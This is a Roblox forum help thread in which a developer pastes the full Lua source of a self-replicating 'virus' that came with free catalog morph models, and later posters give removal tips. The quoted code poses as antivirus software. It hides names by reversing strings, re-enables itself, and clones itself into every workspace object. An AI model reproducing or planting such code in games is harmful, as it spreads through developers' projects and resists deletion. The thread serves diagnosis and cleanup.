|
| 08 Jun 2014 08:14 PM |
I was working on building a place and I was going to add morphs. Unfortunately, when I went to the catalog to get the morphs and added them to the game, they contained hacks. When I attempted to delete the hack script, it went away for a minute, only to reappear and multiply itself. I attempted to rewrite the script and I attempted to break the script by erasing some of the code, but it seemed to only exacerbate the problem. It didn't seem to cause any in-game problems (other than laggy doors, but that may just be my computer), but the fact that several copies of the script appear on the Explorer window is really annoying. Any advice?
Additional info on the hack:
-Made by Nomnomnom1
-At the top of the Explorer info under Workspace, there are two VelocityMotors, one titled "Hello...I åm Your New Lord Lolz" and the other called "ZXMLFCSAJORWQ#)CXFDRE)$#Q)JCOUSEW#)@!HOIFDS(AEQ#HI*DFHRI(#FA."
-Under "Hello...I åm Your New Lord Lolz," there is a VelocityMotor called "ViVRuS" which conains a script called "AntiVirusSoftware." The code under the script is the following:
--[[ Virus Protect Pro! By Nomnomnom1.
Want your place virus free(finally)? Do you want it now? Then use this script and i'll show you the basics of anti virus software!
As you can clearly see...The script below probably already has removed all possible viruses. ]]
---------------------------------------------------------------------------------------------------------------------------------------------- cs = { "Timer", "Geometry", "Weld", "RotateP", "RotateV", "VelocityMotor" } -- Classes the script knows so it can remove it ;) Enter more here lol g = { "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, "å", "º", "¬", "+" } -- checks for all of the possible special characters....again enter more here ;D egd = script ---------------------------------------------------------------------------------------------------------------------------------------------- ----------------Please do not edit anything beyond this point ^_^-------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------- for i = 1, #cs do if egd.className ~= cs[i] then s=true end end if s == true then local s = Instance.new(cs[math.random(1, #cs)]) s.Parent = script.Parent script.Parent = s egd=egd.Parent s.Name = string.reverse("SuRViV") else egd=egd.Parent end egdd = egd:Clone() pcall(function() egdd.Help:remove() end) wait() tp = egd.Parent local sos = string.reverse("delbasiD") lssii = workspace lssi = lssii:GetChildren() coroutine.resume(coroutine.create(function() while true do egd[sos] = false wait() end end)) coroutine.resume(coroutine.create(function() for i = 1 , math.huge do wait(60*3) if game.Players.NumPlayers > 1 then local m = Instance.new("Hint") m.Parent = workspace m.Name = "å" m.Text = string.reverse("!AHAHAWM !oot uoy kcah lliw 1monmonmoN") end end end)) function Kelssxx(s) return string.reverse(s) end
function lk(property) local kte = property if kte == "Disabled" then egd[kte] = false end end
function SAVEDZOMG(place) if lssii:findFirstChild(place) == nil then local v = Instance.new(cs[math.random(1, #cs)]) v.Parent = workspace v.Name = place end end
function nft(ssaa) for i = 1, #ssaa:children() do if string.find(ssaa:children()[i].Name, "Tazer") then print("Fake Virus Scanner Found!") ssaa:GetChildren()[i]:remove() elseif ssaa:children()[i]:findFirstChild(egd.Name) == nil and ssaa:children()[i].Name ~= script.Name then print("Backing up " ..tp.Name.. "...") egd:Clone().Parent = ssaa:children()[i] end end end
tp.DescendantRemoving:connect(function(jji) if jji == egd then egdd.Parent = tp print("Backing up " ..tp.Name.. "...") egdd[sos] = false end end)
script.Changed:connect(lk) while true do nft(lssii) nft(game:service(string.reverse("smaeT"))) SAVEDZOMG(string.reverse("mroW")) SAVEDZOMG(string.reverse("devas gmoZ")) SAVEDZOMG(string.reverse("AF#(IRHFD*IH#QEA(SDFIOH!@)#WESUOCJ)Q#$)ERDFXC)#QWROJASCFLMXZ")) wait(1) end
-Also under "Hello...I åm Your New Lord Lolz" is a script called "Script...Or is it..." which contains the following code:
-- Thanks for using My hack.............suka XD
if script.Parent.className ~= "RotateP" then local p = Instance.new("RotateP") p.Parent = workspace p.Name = "dåååååååååååååång.........you got owned..." script.Parent = p end
function check() local list = workspace:GetChildren() for i = 1, #list do if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then script.Parent:Clone().Parent = list[i] end wait() end end
while true do check() if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then local main = script.Parent:Clone() main.Name = "Hello...I åm Your New Lord Lolz" main.Parent = workspace end wait(3) end -- Credit goes to Nomnomnom1..........................really..........did you need to know?! -- Have a nice day. XD
-"ZXMLFCSAJORWQ#)CXFDRE)$#Q)JCOUSEW#)@!HOIFDS(AEQ#HI*DFHRI(#FA" contains the exact same thing, other than "Script...Or is it..." is under the VelocityMotor "dåååååååååååååång.........you got owned..."
Help! Oh, and sorry if this is the wrong forum. And sorry if this is TL;DR. |
|
|
| Report Abuse |
|
|
| |
|
|
| 08 Jun 2014 08:20 PM |
@heBestKingGotSwagg
You do realize that you just confessed to being one of his accomplices, right? |
|
|
| Report Abuse |
|
|
| |
|
|
| 08 Jun 2014 08:42 PM |
| My friend MegaRen had this on his game, Godzilla the Paper Morph Adventure.. he told me all he did, was that he had to go into EVERY model or object he had in the game, and delete the script in each of them. Since, the hack adds a seperate one into EACH and EVERY model or object you have in the game. Don't worry, it can be fixed, and its pretty easy if you don't have a lot of stuff D: |
|
|
| Report Abuse |
|
|
|
| 08 Jun 2014 08:52 PM |
| I've tried that but the hack seems to multiply itself when it gets deleted. I think I'm gonna have to delete everything in it and start from scratch. |
|
|
| Report Abuse |
|
|
|
| 08 Jun 2014 08:56 PM |
| Well thats strange.. then, i honestly don't know what to tell you.. but, i dont know if you did or not, but if you have a model, you have to check in ALL the seperate parts of it.. kind of like checking inside of bricks for it.. and that also includes, the terrain, startergui, starterpack, and all those others. If you did that, then the best thing to do is start all over. :/ |
|
|
| Report Abuse |
|
|
|
| 08 Jun 2014 08:57 PM |
| Don't use free models. the end |
|
|
| Report Abuse |
|
|
sands124
|
  |
| Joined: 02 Oct 2009 |
| Total Posts: 187 |
|
|
| 08 Jun 2014 09:03 PM |
| THE SOLUTION: PAUSE THE GAME WHILE YOUR EDITING... THEN OPEN PROPERTIES... THEN CLICK THE SCRIPT AND CLICK THE CHECK BOX NEXT TO DISABLE IN PROPERTIES... THEN DO THAT FOR ALL THE OTHER ONES.... AFTER YOU THINK YOU HAVE DISABLED ALL OF THE SCRIPTS THAT KEEP COMING BACK TRY TO DELETE ONE. IF IT DOESN'T COME BACK THEN IT WAS A SUCCESS AND DELETE THE REST. BUT IF IT DOES COME BACK YOU FORGOT TO DISABLE ONE OF THEM... SO FIND THE ONE THAT WASN'T DISABLED... AFTER THAT DELETE ALL OF THE SCRIPTS IF THEY DON'T COME BACK. I Hope This Helps :D |
|
|
| Report Abuse |
|
|
|
| 08 Jun 2014 10:02 PM |
@sands
Tried it. Somehow they still came back. |
|
|
| Report Abuse |
|
|
|
| 08 Jun 2014 10:03 PM |
| I'm gonna try reverting to an earlier version of the game and see what happens. |
|
|
| Report Abuse |
|
|
| |
|
|
| 08 Jun 2014 10:06 PM |
@groovy
I only used the morphs because I don't know how to make them. Everything else was my own work.
Also, reverting back to the original blank baseplate eradicated the problem. :-) |
|
|
| Report Abuse |
|
|
| |
|
| |
|
|
| 25 Dec 2014 03:51 PM |
If only i could help you. Contact Roblox on hotmail and tell them the name of the hacker and what he did...maybe they will help? :/ |
|
|
| Report Abuse |
|
|
| |
|
|
| 25 Dec 2014 04:29 PM |
| why would she give up? That's stupid >.> |
|
|
| Report Abuse |
|
|
|
| 25 Apr 2015 03:08 PM |
| Use the plugin called 'Zeph's Virus Detector' on roblox. Delete all your other plugins then use it. It should clear all of it. Use it everytime you join the edit. |
|
|
| Report Abuse |
|
|
AirDanny
|
  |
| Joined: 01 Apr 2011 |
| Total Posts: 324 |
|
|
| 25 Apr 2015 03:21 PM |
Try getting anti virus plugins you scrubz
just kydding lulz |
|
|
| Report Abuse |
|
|
Thamals
|
  |
| Joined: 01 Jan 2017 |
| Total Posts: 4 |
|
|
| 21 Feb 2017 09:09 AM |
| Is there a problem with using free models? |
|
|
| Report Abuse |
|
|
|
| 22 Jul 2017 09:33 PM |
| I have this on my game rn!!!!!!!!!!! HOW DO I GET RID OF IT? D: |
|
|
| Report Abuse |
|
|
xvbones
|
  |
| Joined: 09 Nov 2006 |
| Total Posts: 6029 |
|
|
| 22 Jul 2017 09:46 PM |
This is an old thread so please don't bump, and an extremely old problem (I've had people running into this since about 2009)
To clear this up for anyone having this problem so this thread isn't constantly being bumped:
Look for the "Script...Or is it..." scripts - these are the root of the problem - and delete them and any other strangely named scripts. Deleting the VelocityMotors first will only send you into an infinite loop and you'll never get rid of them. After this delete the VelocityMotors (blue square icon)
Secondly, try adding an antivirus script to your game, these will remove any other suspiciously named items in your game.
Notably, some other virus scripts are named here in case you're unsure: https://forum.roblox.com/Forum/ShowPost.aspx?PostID=176601777
Hope this has helped anyone who had this problem :) |
|
|
| Report Abuse |
|
|
Gammerrz
|
  |
| Joined: 17 Jun 2016 |
| Total Posts: 1 |
|
|
| 04 Aug 2017 09:04 AM |
| Guys. I just found the easiest solution possible. It's a plugin called Ro-Defender. U run it and it deletes the virus. I swear it worked for me ! |
|
|
| Report Abuse |
|
|
|
| 18 Oct 2017 04:17 PM |
| found it while testing a game.. so i discontinued it |
|
|
| Report Abuse |
|
|